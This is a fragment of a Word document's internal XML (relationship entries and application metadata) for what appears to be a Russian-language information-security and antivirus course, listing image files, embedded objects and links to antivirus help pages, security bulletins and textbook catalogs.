Target="http://spb.tele2.ru/services/udobnoe-obshenie/konferenc-svyaz/" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.png"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="file:///Y:\4_complate\&#1073;&#1072;&#1082;&#1072;&#1083;&#1072;&#1074;&#1088;&#1099;\+&#1048;&#1085;&#1092;&#1086;&#1088;&#1084;&#1072;&#1094;&#1080;&#1086;&#1085;&#1085;&#1072;&#1103;%20&#1073;&#1077;&#1079;&#1086;&#1087;&#1072;&#1089;&#1085;&#1086;&#1089;&#1090;&#1100;(&#1051;&#1102;&#1083;&#1103;)\course\resources\CoursePreview\lab.files\image050.gif" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.iwebtool.com/html_encrypter" TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mk:@MSITStore:C:\Users\&#1040;&#1076;&#1084;&#1080;&#1085;&#1080;&#1089;&#1090;&#1088;&#1072;&#1090;&#1086;&#1088;.DNAPC\Desktop\avz4\avz_ru.chm::/script_syscleanaddfile.htm" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image101.jpeg"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/11/2-20.jpg" TargetMode="External"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image114.jpeg"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image129.jpeg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-1sm.jpg" TargetMode="External"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-10.jpg" TargetMode="External"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-14.jpg" TargetMode="External"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-24.jpg" TargetMode="External"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-26.jpg" TargetMode="External"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-38.jpg" TargetMode="External"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/14/5-12.jpg" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bughunter.ru/_pic/bughunter.ru_raz_01_26_13.jpg" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.jpeg"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mk:@MSITStore:C:\Users\&#1040;&#1076;&#1084;&#1080;&#1085;&#1080;&#1089;&#1090;&#1088;&#1072;&#1090;&#1086;&#1088;.DNAPC\Desktop\avz4\avz_ru.chm::/script_quarantinefile.htm" TargetMode="External"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/11/2-7.jpg" TargetMode="External"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-35.jpg" TargetMode="External"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image159.jpeg"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/14/5-17.jpg" TargetMode="External"/><Relationship Id="rId30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28.jpeg"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.jpeg"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.auteltech.com/" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.jpeg"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.png"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image94.png"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/11/2-3.jpg" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/11/2-15.jpg" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image109.jpeg"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image117.jpeg"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image124.jpeg"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/11/2-23.jpg" TargetMode="External"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/11/2-30.jpg" TargetMode="External"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-4.jpg" TargetMode="External"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-7.jpg" TargetMode="External"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image137.jpeg"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image139.jpeg"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image148.jpeg"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/14/5-3.jpg" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.jpeg"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.jpeg"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://z-oleg.com/secur/avz_doc/t_infected.htm" TargetMode="External"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-30.jpg" TargetMode="External"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image154.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpeg"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bughunter.ru/_pic/bughunter.ru_raz_01_26_16.jpg" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.jpeg"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.png"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://znanium.com/catalog/product/549989" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="file:///Y:\4_complate\&#1073;&#1072;&#1082;&#1072;&#1083;&#1072;&#1074;&#1088;&#1099;\+&#1048;&#1085;&#1092;&#1086;&#1088;&#1084;&#1072;&#1094;&#1080;&#1086;&#1085;&#1085;&#1072;&#1103;%20&#1073;&#1077;&#1079;&#1086;&#1087;&#1072;&#1089;&#1085;&#1086;&#1089;&#1090;&#1100;(&#1051;&#1102;&#1083;&#1103;)\course\resources\CoursePreview\lab.files\image059.gif" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.png"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.microsoft.com/technet/security/bulletin/ms06-057.mspx" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mk:@MSITStore:C:\Users\&#1040;&#1076;&#1084;&#1080;&#1085;&#1080;&#1089;&#1090;&#1088;&#1072;&#1090;&#1086;&#1088;.DNAPC\Desktop\avz4\avz_ru.chm::/script_syscleangetfileslist.htm" TargetMode="External"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:anonymous@anonymous.com" TargetMode="External"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/11/2-10.jpg" TargetMode="External"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.jpeg"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image112.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http://www.intuit.ru/department/security/antiviruskasp/11/2-18.jpg" TargetMode="External"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/11/2-33.jpg" TargetMode="External"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image127.jpeg"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image135.jpeg"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-27.jpg" TargetMode="External"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-39.jpg" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.jpeg"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image134.jpeg"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image142.jpeg"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-36.jpg" TargetMode="External"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/14/5-9.jpg" TargetMode="External"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.jpeg"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.jpeg"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.emf"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mk:@MSITStore:C:\Users\&#1040;&#1076;&#1084;&#1080;&#1085;&#1080;&#1089;&#1090;&#1088;&#1072;&#1090;&#1086;&#1088;.DNAPC\Desktop\avz4\avz_ru.chm::/script_quarantinefile.htm" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image97.jpeg"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image107.jpeg"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/11/2-26.jpg" TargetMode="External"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/11/2-28.jpg" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.emf"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image130.jpeg"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-19.jpg" TargetMode="External"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image146.jpeg"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/14/5-1.jpg" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.jpeg"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.jpeg"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.jpeg"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.emf"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://lists.apple.com/mhonarc/security-announce/msg00048.htm" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mk:@MSITStore:C:\Users\&#1040;&#1076;&#1084;&#1080;&#1085;&#1080;&#1089;&#1090;&#1088;&#1072;&#1090;&#1086;&#1088;.DNAPC\Desktop\avz4\avz_ru.chm::/script_checkfile.htm" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.jpeg"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image102.jpeg"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/11/2-21.jpg" TargetMode="External"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image125.jpeg"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-11.jpg" TargetMode="External"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-25.jpg" TargetMode="External"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image151.jpeg"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image160.jpeg"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bughunter.ru/_pic/bughunter.ru_raz_01_26_14.jpg" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mts.ru/mob_connect/services/direction_calls/other_services/conference_call/" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.jpeg"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject3.bin"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mk:@MSITStore:C:\Users\&#1040;&#1076;&#1084;&#1080;&#1085;&#1080;&#1089;&#1090;&#1088;&#1072;&#1090;&#1086;&#1088;.DNAPC\Desktop\avz4\avz_ru.chm::/script_quarantinefile.htm" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.png"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/11/2-4.jpg" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/11/2-16.jpg" TargetMode="External"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image118.jpeg"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image120.jpeg"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-5.jpg" TargetMode="External"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image138.jpeg"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-31.jpg" TargetMode="External"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image155.jpeg"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject2.bin"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.jpeg"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.jpeg"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image77.emf"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.microsoft.com/technet/security/bulletin/ms06-067.mspx" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.jpeg"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mk:@MSITStore:C:\Users\&#1040;&#1076;&#1084;&#1080;&#1085;&#1080;&#1089;&#1090;&#1088;&#1072;&#1090;&#1086;&#1088;.DNAPC\Desktop\avz4\avz_ru.chm::/script_attrcodes.htm" TargetMode="External"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/11/2-11.jpg" TargetMode="External"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image113.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/11/2-34.jpg" TargetMode="External"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-12.jpg" TargetMode="External"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.intuit.ru/department/security/antiviruskasp/12/footnote.3.1.htm" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.jpeg"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://moscow.megafon.ru/services/base/service42.html" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.emf"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-37.jpg" TargetMode="External"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/14/5-10.jpg" TargetMode="External"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/14/5-13.jpg" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.jpeg"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.png"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mk:@MSITStore:C:\Users\&#1040;&#1076;&#1084;&#1080;&#1085;&#1080;&#1089;&#1090;&#1088;&#1072;&#1090;&#1086;&#1088;.DNAPC\Desktop\avz4\avz_ru.chm::/script_bc_qrfile.htm" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.intuit.ru/department/security/antiviruskasp/11/footnote.1.2.htm" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image108.jpeg"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/11/2-27.jpg" TargetMode="External"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/11/2-29.jpg" TargetMode="External"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-6.jpg" TargetMode="External"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-20.jpg" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.jpeg"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.jpeg"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image147.jpeg"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/14/5-2.jpg" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://moskva.beeline.ru/customers/products/mobile/services/details/konferents-svyaz/" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image78.emf"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.jpeg"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.myserver.ru/myfile.txt" TargetMode="External"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image103.jpeg"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/11/2-22.jpg" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.jpeg"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image126.jpeg"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-13.jpg" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bughunter.ru/_pic/bughunter.ru_raz_01_26_15.jpg" TargetMode="External"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image143.jpeg"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image152.jpeg"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16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4AAFF-519D-4704-8A1F-CC3F48D22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280</Pages>
  <Words>78675</Words>
  <Characters>448450</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>3737</Lines>
  <Paragraphs>1052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526073</CharactersWithSpaces>
  <SharedDoc>false</SharedDoc>
  <HLinks>
    <vt:vector size="180" baseType="variant">
      <vt:variant>
        <vt:i4>983051</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>138</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://znanium.com/catalog/product/537054</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>851979</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>135</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://znanium.com/catalog/product/508381</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>458767</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>132</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://znanium.com/catalog/product/945331</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>786437</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>129</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://znanium.com/catalog/product/549989</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5308438</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>126</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.auteltech.com/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5308438</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>123</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.auteltech.com/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6291581</vt:i4>
